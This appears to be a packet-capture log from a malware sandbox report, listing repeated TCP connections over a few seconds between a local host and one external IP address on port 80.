Jul 27, 2023 01:34:38.869225025 CEST	50078	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.871542931 CEST	80	50079	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.871720076 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.872143984 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:38.917113066 CEST	80	50079	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.921724081 CEST	80	50079	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:38.921938896 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.031958103 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.034975052 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.076466084 CEST	80	50079	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.076559067 CEST	50079	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.079763889 CEST	80	50080	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.079943895 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.081033945 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.125971079 CEST	80	50080	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.131048918 CEST	80	50080	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.131138086 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.248094082 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.249033928 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.293181896 CEST	80	50080	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.293348074 CEST	50080	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.293800116 CEST	80	50081	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.293930054 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.294378042 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.338665962 CEST	80	50081	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.343039036 CEST	80	50081	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.343163967 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.467554092 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.481329918 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.511989117 CEST	80	50081	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.512115002 CEST	50081	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.525665045 CEST	80	50082	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.525803089 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.526468039 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.570765972 CEST	80	50082	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.575511932 CEST	80	50082	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.575628042 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.687407970 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.688064098 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.731376886 CEST	80	50082	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.731470108 CEST	50082	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.732234001 CEST	80	50083	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.732316017 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.740684032 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.784962893 CEST	80	50083	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.788255930 CEST	80	50083	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.788433075 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.891530991 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.892374992 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.936125040 CEST	80	50083	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.936247110 CEST	50083	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.936556101 CEST	80	50084	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.936665058 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.937131882 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:39.981951952 CEST	80	50084	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.985275984 CEST	80	50084	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:39.985402107 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.127614021 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.128333092 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.172195911 CEST	80	50084	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.172293901 CEST	50084	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.172699928 CEST	80	50085	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.172791004 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.174154997 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.222122908 CEST	80	50085	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.223193884 CEST	80	50085	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.223258018 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.328716993 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.329509974 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.374058008 CEST	80	50086	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.374207973 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.374315977 CEST	80	50085	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.374386072 CEST	50085	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.381000996 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.425304890 CEST	80	50086	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.429164886 CEST	80	50086	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.429253101 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.541968107 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.542769909 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.586957932 CEST	80	50086	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.587100983 CEST	50086	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.587434053 CEST	80	50087	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.587513924 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.588028908 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.632730007 CEST	80	50087	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.636909008 CEST	80	50087	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.644376040 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.778028011 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.778889894 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.822464943 CEST	80	50087	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.822530031 CEST	50087	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.824214935 CEST	80	50088	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.824309111 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.827960968 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.872725964 CEST	80	50088	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.876207113 CEST	80	50088	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:40.876348972 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:40.995883942 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.002676964 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.041273117 CEST	80	50088	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.041444063 CEST	50088	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.047650099 CEST	80	50089	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.049395084 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.050780058 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.095973969 CEST	80	50089	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.100537062 CEST	80	50089	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.101104021 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.221746922 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.222949028 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.266699076 CEST	80	50089	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.266803026 CEST	50089	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.266954899 CEST	80	50090	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.267142057 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.267807961 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.311964989 CEST	80	50090	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.315283060 CEST	80	50090	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.316001892 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.422929049 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.428006887 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.467269897 CEST	80	50090	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.467382908 CEST	50090	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.472709894 CEST	80	50091	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.472881079 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.474457026 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.518974066 CEST	80	50091	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.523792028 CEST	80	50091	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.523977041 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.645466089 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.646466970 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.690068960 CEST	80	50091	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.690668106 CEST	80	50092	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.690764904 CEST	50091	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.690809965 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.691284895 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.736042023 CEST	80	50092	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.739165068 CEST	80	50092	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.739289999 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.847047091 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.847939968 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.891396999 CEST	80	50092	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.891479969 CEST	50092	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.891968966 CEST	80	50093	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.892050028 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.892855883 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:41.936938047 CEST	80	50093	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.941468000 CEST	80	50093	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:41.941546917 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.051584005 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.052858114 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.096172094 CEST	80	50093	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.096280098 CEST	50093	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.097116947 CEST	80	50094	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.097233057 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.097816944 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.142200947 CEST	80	50094	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.146707058 CEST	80	50094	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.147219896 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.271003962 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.271888018 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.320920944 CEST	80	50094	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.321011066 CEST	80	50095	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.321022987 CEST	50094	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.321079969 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.322523117 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.367257118 CEST	80	50095	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.371165037 CEST	80	50095	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.371251106 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.498583078 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.501177073 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.543431044 CEST	80	50095	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.543957949 CEST	50095	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.545223951 CEST	80	50096	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.549299955 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.552546024 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.596527100 CEST	80	50096	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.600610018 CEST	80	50096	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.601272106 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.724098921 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.724931002 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.768322945 CEST	80	50096	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.768449068 CEST	50096	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.769928932 CEST	80	50097	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.771312952 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.771971941 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.817115068 CEST	80	50097	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.821285009 CEST	80	50097	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.823019028 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.938900948 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.939574957 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.983846903 CEST	80	50097	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.984028101 CEST	50097	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.984091997 CEST	80	50098	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:42.984205961 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:42.999835968 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.044349909 CEST	80	50098	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.048254013 CEST	80	50098	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.049086094 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.156553984 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.157385111 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.201334000 CEST	80	50098	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.201437950 CEST	50098	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.201916933 CEST	80	50099	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.202029943 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.202574968 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.247483015 CEST	80	50099	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.251418114 CEST	80	50099	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.251511097 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.372076035 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.372807980 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.416897058 CEST	80	50099	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.417453051 CEST	80	50100	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.417541027 CEST	50099	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.417577028 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.418942928 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.463078022 CEST	80	50100	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.467307091 CEST	80	50100	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.467381001 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.585510969 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.586358070 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.629791021 CEST	80	50100	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.629933119 CEST	50100	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.630665064 CEST	80	50101	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.630764961 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.657293081 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.701777935 CEST	80	50101	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.705420971 CEST	80	50101	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.705507994 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.812810898 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.813700914 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.856950045 CEST	80	50101	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.857053041 CEST	50101	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.858175039 CEST	80	50102	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.858314037 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.858784914 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:43.903038025 CEST	80	50102	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.907200098 CEST	80	50102	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:43.907427073 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.017450094 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.018373966 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.062685013 CEST	80	50103	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.062724113 CEST	80	50102	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.062870979 CEST	50102	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.063249111 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.063651085 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.107666016 CEST	80	50103	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.113854885 CEST	80	50103	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.113998890 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.248951912 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.250505924 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.293514967 CEST	80	50103	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.293584108 CEST	50103	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.294922113 CEST	80	50104	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.295043945 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.296425104 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.340908051 CEST	80	50104	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.345272064 CEST	80	50104	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.345412970 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.453576088 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.454268932 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.499306917 CEST	80	50104	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.499428988 CEST	50104	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.499700069 CEST	80	50105	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.499790907 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.500380039 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.546370983 CEST	80	50105	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.549408913 CEST	80	50105	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.549539089 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.656348944 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.658176899 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.700798988 CEST	80	50105	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.701026917 CEST	50105	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.702658892 CEST	80	50106	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.702811956 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.704464912 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.749140978 CEST	80	50106	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.753607035 CEST	80	50106	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.753751993 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.871393919 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.872139931 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.916235924 CEST	80	50107	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.916301966 CEST	80	50106	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.916477919 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.917507887 CEST	50106	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.919317961 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:44.963560104 CEST	80	50107	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.968126059 CEST	80	50107	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:44.968216896 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.084455013 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.085246086 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.128623962 CEST	80	50107	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.128710032 CEST	50107	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.129569054 CEST	80	50108	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.129653931 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.130831003 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.175211906 CEST	80	50108	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.178554058 CEST	80	50108	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.178658962 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.281800032 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.283371925 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.326572895 CEST	80	50108	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.326778889 CEST	50108	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.328198910 CEST	80	50109	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.328360081 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.331247091 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.375817060 CEST	80	50109	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.380186081 CEST	80	50109	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.380284071 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.490504980 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.492378950 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.535131931 CEST	80	50109	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.535223007 CEST	50109	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.536951065 CEST	80	50110	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.537058115 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.545176029 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.589641094 CEST	80	50110	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.595911980 CEST	80	50110	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.595995903 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.707097054 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.707993984 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.753099918 CEST	80	50110	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.753240108 CEST	50110	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.753808022 CEST	80	50111	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.753922939 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.754368067 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.799566984 CEST	80	50111	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.803035021 CEST	80	50111	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.803407907 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.907716036 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.908584118 CEST	50112	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.953377962 CEST	80	50111	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.953854084 CEST	80	50112	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:45.953983068 CEST	50111	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:45.954030037 CEST	50112	80	192.168.2.5	77.91.68.61
